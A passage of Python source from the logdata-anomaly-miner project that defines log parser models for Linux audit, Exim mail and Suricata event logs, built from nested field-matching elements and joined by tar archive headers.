FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("syscall", [ FixedDataModelElement("msg_str", b"SYSCALL msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("arch_str", b"): arch="), VariableByteDataModelElement("arch", alphabet), FixedDataModelElement("syscall_str", b" syscall="), DecimalIntegerValueModelElement("syscall", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("success_str", b" success="), VariableByteDataModelElement("success", alphabet), FixedDataModelElement("exit_str", b" exit="), VariableByteDataModelElement("exit", alphabet), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), FixedDataModelElement("items_str", b" items="), VariableByteDataModelElement("items", alphabet), FixedDataModelElement("ppid_str", b" ppid="), VariableByteDataModelElement("ppid", alphabet), FixedDataModelElement("pid_str", b" pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("gid_str", b" gid="), VariableByteDataModelElement("gid", alphabet), FixedDataModelElement("euid_str", b" euid="), VariableByteDataModelElement("euid", alphabet), FixedDataModelElement("suid_str", b" suid="), VariableByteDataModelElement("suid", alphabet), FixedDataModelElement("fsuid_str", b" fsuid="), VariableByteDataModelElement("fsuid", alphabet), FixedDataModelElement("egid_str", b" egid="), VariableByteDataModelElement("egid", alphabet), FixedDataModelElement("sgid_str", b" sgid="), VariableByteDataModelElement("sgid", alphabet), FixedDataModelElement("fsgid_str", b" fsgid="), VariableByteDataModelElement("fsgid", alphabet), FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet), FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("key_str", b" key="), VariableByteDataModelElement("key", alphabet)]), SequenceModelElement("path", [ FixedDataModelElement("msg_str", b"PATH msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("item_str", b"): item="), DecimalIntegerValueModelElement("item", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("name_str", b" name="), VariableByteDataModelElement("name", alphabet), FirstMatchModelElement("path", [ SequenceModelElement("nametype", [ FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)]), SequenceModelElement("inode", [ FixedDataModelElement("inode_str", b" inode="), DecimalIntegerValueModelElement("inode", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("dev_str", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("mode_str", b" mode="), VariableByteDataModelElement("mode", alphabet), FixedDataModelElement("ouid_str", b" ouid="), VariableByteDataModelElement("ouid", alphabet), FixedDataModelElement("ogid_str", b" ogid="), VariableByteDataModelElement("ogid", alphabet), FixedDataModelElement("rdev_str", b" rdev="), VariableByteDataModelElement("rdev", alphabet), FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)])])]), SequenceModelElement("login", [ FixedDataModelElement("msg1_str", b"LOGIN msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("old_auid_str", b" old-auid="), VariableByteDataModelElement("old_auid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), OptionalMatchModelElement( "tty", SequenceModelElement("tty", [ FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet)])), FixedDataModelElement("old_ses_str", b" old-ses="), VariableByteDataModelElement("old_ses", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)]), SequenceModelElement("sockaddr", [ FixedDataModelElement("msg_str", b"SOCKADDR msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("saddr_str", b"): saddr="), VariableByteDataModelElement("saddr", alphabet)]), SequenceModelElement("unknown", [ FixedDataModelElement("unknwon_str", b"UNKNOWN["), DecimalIntegerValueModelElement("unknown_id", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("msg_str", b"] msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("cred_refr", [ FixedDataModelElement("msg1_str", b"CRED_REFR msg=")] + seq), SequenceModelElement("user_start", [ FixedDataModelElement("msg1_str", b"USER_START msg=")] + seq), SequenceModelElement("user_acct", [ FixedDataModelElement("msg1_str", b"USER_ACCT msg=")] + seq), SequenceModelElement("user_auth", [ FixedDataModelElement("msg1_str", b"USER_AUTH msg=")] + seq), SequenceModelElement("user_login", [ FixedDataModelElement("msg1_str", b"USER_LOGIN msg=")] + seq), SequenceModelElement("cred_disp", [ FixedDataModelElement("msg1_str", b"CRED_DISP msg=")] + seq), SequenceModelElement("service_start", [ FixedDataModelElement("msg1_str", b"SERVICE_START msg=")] + seq), SequenceModelElement("service_stop", [ FixedDataModelElement("msg1_str", b"SERVICE_STOP msg=")] + seq), SequenceModelElement("user_end", [ FixedDataModelElement("msg1_str", b"USER_END msg=")] + seq), SequenceModelElement("user_cmd", [ FixedDataModelElement("msg1_str", b"USER_CMD msg=")] + seq), SequenceModelElement("cred_acq", [ FixedDataModelElement("msg1_str", b"CRED_ACQ msg=")] + seq), SequenceModelElement("avc", [ FixedDataModelElement("abc_str", b"AVC msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("apparmor_str", b"): apparmor=\""), DelimitedDataModelElement("apparmor", b"\""), FixedDataModelElement("operation_str", b"\" operation=\""), DelimitedDataModelElement("operation", b"\""), OptionalMatchModelElement( "opt", SequenceModelElement("seq", [ FixedDataModelElement("info_str", b"\" info=\""), DelimitedDataModelElement("info", b"\"")])), FixedDataModelElement("profile_str", b"\" profile=\""), DelimitedDataModelElement("profile", b"\""), FixedDataModelElement("name_str", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("pid_str", b"\" pid="), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("comm_str", b" comm=\""), DelimitedDataModelElement("comm", b"\""), FixedDataModelElement("quote", b"\"")]), SequenceModelElement("user_bprm_fcaps", [ FixedDataModelElement("msg1_str", b"BPRM_FCAPS msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("fver_str", b"): fver="), VariableByteDataModelElement("fver", alphabet), FixedDataModelElement("fp_str", b" fp="), VariableByteDataModelElement("fp", alphabet), FixedDataModelElement("fi_str", b" fi="), VariableByteDataModelElement("fi", alphabet), FixedDataModelElement("fe_str", b" fe="), VariableByteDataModelElement("fe", alphabet), FixedDataModelElement("old_pp_str", b" old_pp="), VariableByteDataModelElement("old_pp", alphabet), FixedDataModelElement("old_pi_str", b" old_pi="), VariableByteDataModelElement("old_pi", alphabet), FixedDataModelElement("old_pe_str", b" old_pe="), VariableByteDataModelElement("old_pe", alphabet), FixedDataModelElement("new_pp_str", b" new_pp="), VariableByteDataModelElement("new_pp", alphabet), FixedDataModelElement("new_pi_str", b" new_pi="), VariableByteDataModelElement("new_pi", alphabet), FixedDataModelElement("new_pe_str", b" new_pe="), VariableByteDataModelElement("new_pe", alphabet)])])]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/EximParsingModel.py000066400000000000000000000227561500476301700322130ustar00rootroot00000000000000"""This module defines a parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Exim logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S"), FixedDataModelElement("sp", b" "), FirstMatchModelElement("fm", [ SequenceModelElement("start", [ FixedDataModelElement("start", b"Start queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("start", [ FixedDataModelElement("start", b"TLS error"), AnyByteDataModelElement('remainder') ]), SequenceModelElement("end", [ FixedDataModelElement("end", b"End queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("no_host_found", [ FixedDataModelElement("no_host_found_str", b"no host name found for IP address "), IpAddressDataModelElement("ip"), ]), SequenceModelElement("start_daemon", [ FixedDataModelElement("start_daemon_str", b"exim "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("start_deamon_str2", b" daemon started"), AnyByteDataModelElement("msg") ]), SequenceModelElement("vrfy_failed", [ FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("h_str", b" H="), DelimitedDataModelElement("h", b" "), FixedDataModelElement("sp1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("sp2", b"]") ]), SequenceModelElement("end", [ DelimitedDataModelElement("spool", b" "), FixedDataModelElement("spool_file_locked", b" Spool file is locked (another process is handling this message)") ]), SequenceModelElement("mail", [ DelimitedDataModelElement("id", b" "), FirstMatchModelElement("dir", [ SequenceModelElement("dir_in", [ FixedDataModelElement("in", b" <= "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("brack", b"<> "), FirstMatchModelElement("fm", [ SequenceModelElement("r", [ FixedDataModelElement("r_str", b"R="), DelimitedDataModelElement("r", b" "), FixedDataModelElement("u_str", b" U="), DelimitedDataModelElement("u", b" "), ]), SequenceModelElement("h", [ FixedDataModelElement("h_str", b"H="), DelimitedDataModelElement("h", b" "), FixedDataModelElement("sp1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("sp1", b"]"), ]) ]), FixedDataModelElement("sp2", b" P="), DelimitedDataModelElement("p", b" "), FixedDataModelElement("sp2", b" S="), DecimalIntegerValueModelElement("s"), ]), SequenceModelElement("seq2", [ DelimitedDataModelElement("mail", b" "), FixedDataModelElement("user_str", b" U="), DelimitedDataModelElement("user", b" "), FixedDataModelElement("p_str", b" P="), DelimitedDataModelElement("p", b" "), FixedDataModelElement("s_str", b" S="), DecimalIntegerValueModelElement("s"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("id_str", b" id="), AnyByteDataModelElement("id") ]) ) ]), AnyByteDataModelElement('remainder') ]) ]), SequenceModelElement("dir_out", [ FixedDataModelElement("in", b" => "), DelimitedDataModelElement("name", b" "), FirstMatchModelElement('fm', [ SequenceModelElement('seq', [ FixedDataModelElement("sp1", b" "), OptionalMatchModelElement( "mail_opt", SequenceModelElement( "mail", [ FixedDataModelElement("brack1", b"("), DelimitedDataModelElement("brack_mail", b")"), FixedDataModelElement("brack2", b") "), ]) ), OptionalMatchModelElement( "opt", SequenceModelElement( "seq", [ FixedDataModelElement("sp2", b"<"), DelimitedDataModelElement("mail", b">"), FixedDataModelElement("closing_brack", b"> "), ]) ), FixedDataModelElement("r_str", b"R="), DelimitedDataModelElement("r", b" "), FixedDataModelElement("t_str", b" T="), VariableByteDataModelElement("t", alphabet), OptionalMatchModelElement( "param_opt", SequenceModelElement( "seq", [ FixedDataModelElement("h_str", b" H="), DelimitedDataModelElement("h", b" X="), FixedDataModelElement("x_str", b" X="), DelimitedDataModelElement("x", b" CV="), FixedDataModelElement("cv_str", b" CV="), DelimitedDataModelElement("cv", b" DN="), FixedDataModelElement("dn_str", b" DN="), DelimitedDataModelElement("dn", b" C="), AnyByteDataModelElement("c"), ])) ]), ]) ]), SequenceModelElement("aster", [ FixedDataModelElement("aster", b" ** "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]), SequenceModelElement("prdr", [ FixedDataModelElement("prdr", b" PRDR "), AnyByteDataModelElement('remainder')]), SequenceModelElement("arrw", [ FixedDataModelElement("arrw", b" -> "), AnyByteDataModelElement('remainder')]), FixedDataModelElement("completed", b" Completed"), FixedDataModelElement("frozen", b" Message is frozen"), FixedDataModelElement("frozen", b" Frozen (delivery error message)") ]) ])])]) return model SuricataEventParsingModel.py000066400000000000000000001031421500476301700337740ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model to parse Suricata Event logs from the AIT-LDS.""" conn = SequenceModelElement("conn", [ FixedDataModelElement("src_ip_str", b'"src_ip":"'), FirstMatchModelElement("ip", [ SequenceModelElement("ipv4", [ IpAddressDataModelElement("src_ip"), FixedDataModelElement("src_port_str", b'","src_port":'), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("dest_ip_str", b',"dest_ip":"'), IpAddressDataModelElement("dest_ip"), FixedDataModelElement("dest_port_str", b'","dest_port":'), DecimalIntegerValueModelElement("dest_port"), FixedDataModelElement("proto_str", b',"proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("quote", b'"') ]), SequenceModelElement("ipv6", [ DelimitedDataModelElement("src_ip", b'"'), FixedDataModelElement("dest_ip_str", b'","dest_ip":"'), DelimitedDataModelElement("dest_ip", b'"'), FixedDataModelElement("proto_str", b'","proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("icmp_type_str", b'","icmp_type":'), DecimalIntegerValueModelElement("icmp_type"), FixedDataModelElement("icmp_code_str", b',"icmp_code":'), DecimalIntegerValueModelElement("icmp_code"), ]), ]) ]) http = SequenceModelElement("http", [ FixedDataModelElement("hostname_str", b',"http":{"hostname":"'), DelimitedDataModelElement("hostname", b'"'), FixedDataModelElement("url_str", b'","url":"'), DelimitedDataModelElement("url", b'"', escape=b"\\"), FixedDataModelElement("http_user_agent_str", b'","http_user_agent":"'), DelimitedDataModelElement("http_user_agent", b'"'), OptionalMatchModelElement( "content_type", SequenceModelElement("content_type", [ FixedDataModelElement("http_content_type_str", b'","http_content_type":"'), DelimitedDataModelElement("http_content_type", b'"'), ])), OptionalMatchModelElement( "http_refer", SequenceModelElement("http_refer", [ FixedDataModelElement("http_refer_str", b'","http_refer":"'), DelimitedDataModelElement("http_refer", b'"'), ])), FixedDataModelElement("http_method_str", b'","http_method":"'), DelimitedDataModelElement("http_method", b'"'), FixedDataModelElement("protocol_str", b'","protocol":"'), DelimitedDataModelElement("protocol", b'"'), FixedDataModelElement("quote_str", b'"'), OptionalMatchModelElement( "status", SequenceModelElement("status", [ FixedDataModelElement("status_str", b',"status":'), DecimalIntegerValueModelElement("status"), ])), OptionalMatchModelElement( "redirect", SequenceModelElement("redirect", [ FixedDataModelElement("redirect_str", b',"redirect":"'), DelimitedDataModelElement("redirect", b'"'), FixedDataModelElement("quote_str", b'"') ])), FixedDataModelElement("length_str", b',"length":'), DecimalIntegerValueModelElement("length"), FixedDataModelElement("brack_str", b"}") ]) model = SequenceModelElement("model", [ FixedDataModelElement("time_str", b'{"timestamp":"'), DateTimeModelElement("time", b"%Y-%m-%dT%H:%M:%S.%f%z"), FixedDataModelElement("comma_str", b'",'), OptionalMatchModelElement( "flow_id", SequenceModelElement("flow_id", [ FixedDataModelElement("flow_id_str", b'"flow_id":'), DecimalIntegerValueModelElement("flow_id"), FixedDataModelElement("comma_str", b",")])), OptionalMatchModelElement( "in_iface", SequenceModelElement("in_iface", [ FixedDataModelElement("in_iface_str", b'"in_iface":"'), DelimitedDataModelElement("in_iface", b'"'), FixedDataModelElement("comma_str", b'",')])), FixedDataModelElement("event_type_str", b'"event_type":"'), FirstMatchModelElement("event_type", [ SequenceModelElement("dns", [ FixedDataModelElement("dns_str", b'dns",'), conn, SequenceModelElement("dns", [ FixedDataModelElement("type_str", b',"dns":{"type":"'), DelimitedDataModelElement("type", b'"'), FixedDataModelElement("id_str", b'","id":'), DecimalIntegerValueModelElement("id"), OptionalMatchModelElement( "rcode", SequenceModelElement("rcode", [ FixedDataModelElement("rcode_str", b',"rcode":"'), DelimitedDataModelElement("rcode", b'"'), FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("rrname_str", b',"rrname":"'), DelimitedDataModelElement("rrname", b'"'), OptionalMatchModelElement("rrtype", SequenceModelElement("rrtype", [ FixedDataModelElement("rrtype_str", b'","rrtype":"'), DelimitedDataModelElement("rrtype", b'"')])), FixedDataModelElement("quote", b'"'), OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id")])), OptionalMatchModelElement("ttl", SequenceModelElement("ttl", [ FixedDataModelElement("ttl_str", b',"ttl":'), DecimalIntegerValueModelElement("ttl")])), OptionalMatchModelElement( "rdata", SequenceModelElement("rdata", [ FixedDataModelElement("rdata_str", b',"rdata":"'), DelimitedDataModelElement("rdata", b'"'), FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("flow", [ FixedDataModelElement("flow_str", b'flow",'), conn, OptionalMatchModelElement( "app_proto", SequenceModelElement("app_proto", [ FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), OptionalMatchModelElement( "app_proto_tc", SequenceModelElement("app_proto_tc", [ FixedDataModelElement("app_proto_tc_str", b',"app_proto_tc":"'), DelimitedDataModelElement("app_proto_tc", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), SequenceModelElement("flow", [ FixedDataModelElement("pkts_toserver_str", b',"flow":{"pkts_toserver":'), DecimalIntegerValueModelElement("pkts_toserver"), FixedDataModelElement("pkts_toclient_str", b',"pkts_toclient":'), DecimalIntegerValueModelElement("pkts_toclient"), FixedDataModelElement("bytes_toserver_str", b',"bytes_toserver":'), DecimalIntegerValueModelElement("bytes_toserver"), FixedDataModelElement("bytes_toclient_str", b',"bytes_toclient":'), DecimalIntegerValueModelElement("bytes_toclient"), FixedDataModelElement("start_str", b',"start":"'), DelimitedDataModelElement("start", b'"'), FixedDataModelElement("end_str", b'","end":"'), DelimitedDataModelElement("end", b'"'), FixedDataModelElement("age_str", b'","age":'), DecimalIntegerValueModelElement("age"), FixedDataModelElement("state_str", b',"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("reason_str", b'","reason":"'), DelimitedDataModelElement("reason", b'"'), FixedDataModelElement("alerted_str", b'","alerted":'), FixedWordlistDataModelElement("alerted", [b"true", b"false"]), FixedDataModelElement("brack_str1", b"}"), OptionalMatchModelElement( "tcp", SequenceModelElement("tcp", [ FixedDataModelElement("tcp_flags_str", b',"tcp":{"tcp_flags":"'), HexStringModelElement("tcp_flags"), FixedDataModelElement("tcp_flags_ts_str", b'","tcp_flags_ts":"'), HexStringModelElement("tcp_flags_ts"), FixedDataModelElement("tcp_flags_tc_str", b'","tcp_flags_tc":"'), HexStringModelElement("tcp_flags_tc"), OptionalMatchModelElement( "flags", SequenceModelElement("flags", [ FixedDataModelElement("syn_str", b'","syn":'), FixedWordlistDataModelElement("syn", [b"true", b"false"]), OptionalMatchModelElement( "fin", SequenceModelElement("fin", [ FixedDataModelElement("fin_str", b',"fin":'), FixedWordlistDataModelElement("fin", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "rst", SequenceModelElement("rst", [ FixedDataModelElement("rst_str", b',"rst":'), FixedWordlistDataModelElement("rst", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "psh", SequenceModelElement("psh", [ FixedDataModelElement("psh_str", b',"psh":'), FixedWordlistDataModelElement("psh", [b"true", b"false"]), ]) ), FixedDataModelElement("ack_str", b',"ack":'), FixedWordlistDataModelElement("ack", [b"true", b"false"]), FixedDataModelElement("tcp_state_str", b',"state":"'), DelimitedDataModelElement("tcp_state", b'"'), ]) ), FixedDataModelElement("tcp_brack_str", b'"}'), ]) ), FixedDataModelElement("brack_str2", b"}") ]), ]), SequenceModelElement("http", [ FixedDataModelElement("http_str", b'http",'), conn, FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), http, FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'fileinfo",'), conn, http, FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'","fileinfo":{'), OptionalMatchModelElement( "filename", SequenceModelElement("filename", [ FixedDataModelElement("filename_str", b'"filename":"'), DelimitedDataModelElement("filename", b'"'), FixedDataModelElement("quote_str", b'",') ]) ), FixedDataModelElement("state_str", b'"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("stored_str", b'","stored":'), FixedWordlistDataModelElement("stored", [b"true", b"false"]), FixedDataModelElement("size_str", b',"size":'), DecimalIntegerValueModelElement("size"), FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("stats", [ FixedDataModelElement("stats_str", b'stats",'), FixedDataModelElement("uptime_str", b'"stats":{"uptime":'), DecimalIntegerValueModelElement("uptime"), SequenceModelElement("capture", [ FixedDataModelElement("capture_str", b',"capture":{'), FixedDataModelElement("kernel_packets_str", b'"kernel_packets":'), DecimalIntegerValueModelElement("kernel_packets"), FixedDataModelElement("kernel_drops_str", b',"kernel_drops":'), DecimalIntegerValueModelElement("kernel_drops"), FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("decoder", [ FixedDataModelElement("pkts_str", b',"decoder":{"pkts":'), DecimalIntegerValueModelElement("pkts"), FixedDataModelElement("bytes_str", b',"bytes":'), DecimalIntegerValueModelElement("bytes"), FixedDataModelElement("invalid_str", b',"invalid":'), DecimalIntegerValueModelElement("invalid"), FixedDataModelElement("ipv4_str", b',"ipv4":'), DecimalIntegerValueModelElement("ipv4"), FixedDataModelElement("ipv6_str", b',"ipv6":'), DecimalIntegerValueModelElement("ipv6"), FixedDataModelElement("ethernet_str", b',"ethernet":'), DecimalIntegerValueModelElement("ethernet"), FixedDataModelElement("raw_str", b',"raw":'), DecimalIntegerValueModelElement("raw"), FixedDataModelElement("null_str", b',"null":'), DecimalIntegerValueModelElement("null"), FixedDataModelElement("sll_str", b',"sll":'), DecimalIntegerValueModelElement("sll"), FixedDataModelElement("tcp_str", b',"tcp":'), DecimalIntegerValueModelElement("tcp"), FixedDataModelElement("udp_str", b',"udp":'), DecimalIntegerValueModelElement("udp"), FixedDataModelElement("sctp_str", b',"sctp":'), DecimalIntegerValueModelElement("sctp"), FixedDataModelElement("icmpv4_str", b',"icmpv4":'), DecimalIntegerValueModelElement("icmpv4"), FixedDataModelElement("icmpv6_str", b',"icmpv6":'), DecimalIntegerValueModelElement("icmpv6"), FixedDataModelElement("ppp_str", b',"ppp":'), DecimalIntegerValueModelElement("ppp"), FixedDataModelElement("pppoe_str", b',"pppoe":'), DecimalIntegerValueModelElement("pppoe"), FixedDataModelElement("gre_str", b',"gre":'), DecimalIntegerValueModelElement("gre"), FixedDataModelElement("vlan_str", b',"vlan":'), DecimalIntegerValueModelElement("vlan"), FixedDataModelElement("vlan_qinq_str", b',"vlan_qinq":'), DecimalIntegerValueModelElement("vlan_qinq"), FixedDataModelElement("teredo_str", b',"teredo":'), DecimalIntegerValueModelElement("teredo"), FixedDataModelElement("ipv4_in_ipv6_str", b',"ipv4_in_ipv6":'), DecimalIntegerValueModelElement("ipv4_in_ipv6"), FixedDataModelElement("ipv6_in_ipv6_str", b',"ipv6_in_ipv6":'), DecimalIntegerValueModelElement("ipv6_in_ipv6"), FixedDataModelElement("mpls_str", b',"mpls":'), DecimalIntegerValueModelElement("mpls"), FixedDataModelElement("avg_pkt_size_str", b',"avg_pkt_size":'), DecimalIntegerValueModelElement("avg_pkt_size"), FixedDataModelElement("max_pkt_size_str", b',"max_pkt_size":'), DecimalIntegerValueModelElement("max_pkt_size"), FixedDataModelElement("erspan_str", b',"erspan":'), DecimalIntegerValueModelElement("erspan"), SequenceModelElement("ipraw", [ FixedDataModelElement("invalid_ip_version_str", b',"ipraw":{"invalid_ip_version":'), DecimalIntegerValueModelElement("invalid_ip_version"), ]), SequenceModelElement("ltnull", [ FixedDataModelElement("ipraw_pkt_too_small_str", b'},"ltnull":{"pkt_too_small":'), DecimalIntegerValueModelElement("ipraw_pkt_too_small"), FixedDataModelElement("unsupported_type", b',"unsupported_type":'), DecimalIntegerValueModelElement("unsupported_type"), ]), SequenceModelElement("dce", [ FixedDataModelElement("dce_pkt_too_small_str", b'},"dce":{"pkt_too_small":'), DecimalIntegerValueModelElement("dce_pkt_too_small"), FixedDataModelElement("brack_str", b"}") ]) ]), SequenceModelElement("flow", [ FixedDataModelElement("memcap_str", b'},"flow":{"memcap":'), DecimalIntegerValueModelElement("memcap"), FixedDataModelElement("spare_str", b',"spare":'), DecimalIntegerValueModelElement("spare"), FixedDataModelElement("emerg_mode_entered_str", b',"emerg_mode_entered":'), DecimalIntegerValueModelElement("emerg_mode_entered"), FixedDataModelElement("emerg_mode_over_str", b',"emerg_mode_over":'), DecimalIntegerValueModelElement("emerg_mode_over"), FixedDataModelElement("tcp_reuse_str", b',"tcp_reuse":'), DecimalIntegerValueModelElement("tcp_reuse"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), ]), SequenceModelElement("defrag", [ SequenceModelElement("ipv4", [ FixedDataModelElement("fragments_str", b'},"defrag":{"ipv4":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), SequenceModelElement("ipv6", [ FixedDataModelElement("fragments_str", b'},"ipv6":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), FixedDataModelElement("max_frag_hits_str", b'},"max_frag_hits":'), DecimalIntegerValueModelElement("max_frag_hits"), ]), SequenceModelElement("tcp", [ FixedDataModelElement("sessions_str", b'},"tcp":{"sessions":'), DecimalIntegerValueModelElement("sessions"), FixedDataModelElement("ssn_memcap_drop_str", b',"ssn_memcap_drop":'), DecimalIntegerValueModelElement("ssn_memcap_drop"), FixedDataModelElement("pseudo_str", b',"pseudo":'), DecimalIntegerValueModelElement("pseudo"), FixedDataModelElement("pseudo_failed_str", b',"pseudo_failed":'), DecimalIntegerValueModelElement("pseudo_failed"), FixedDataModelElement("invalid_checksum_str", b',"invalid_checksum":'), DecimalIntegerValueModelElement("invalid_checksum"), FixedDataModelElement("no_flow_str", b',"no_flow":'), DecimalIntegerValueModelElement("no_flow"), FixedDataModelElement("syn_str", b',"syn":'), DecimalIntegerValueModelElement("syn"), FixedDataModelElement("synack_str", b',"synack":'), DecimalIntegerValueModelElement("synack"), FixedDataModelElement("rst_str", b',"rst":'), DecimalIntegerValueModelElement("rst"), FixedDataModelElement("segment_memcap_drop_str", b',"segment_memcap_drop":'), DecimalIntegerValueModelElement("segment_memcap_drop"), 